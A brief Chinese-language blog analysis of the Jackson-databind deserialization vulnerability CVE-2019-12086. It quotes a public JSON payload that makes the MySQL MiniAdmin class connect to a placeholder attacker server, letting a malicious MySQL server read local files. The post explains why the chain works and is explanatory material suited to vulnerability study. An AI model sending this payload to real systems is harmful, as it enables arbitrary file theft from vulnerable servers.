Jackson-CVE-2019-12086的反序列化漏洞,看到GitHub放出了Payload,这里这个简单的跟踪分析。
GitHub地址: https://github.com/c0d3p1ut0s/CVE-2019-12086-jackson-databind-file-read/blob/master/README.md
网上放出的Payload如下:
["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]
安装网上的分析:
1、在开启Default Typing的情况下,jackson在反序列化json时,可以反序列化指定类,且可以指定一个基础类型的值作为这个类的构造函数的参数的值。2、com.mysql.cj.jdbc.admin.MiniAdmin的构造函数接受一个string的值,这个值代表jdbcURL3、com.mysql.cj.jdbc.admin.MiniAdmin类在初始化会连接这个jdbcURL中指定的MySQL数据库。4、在mysql-connector-java 8.0.15版本(2019.2.1发布)以下,恶意MySQL服务器可以读取MySQL客户端的任意本地文件,从而导致漏洞产生。
若有收获,就点个赞吧
0 人点赞
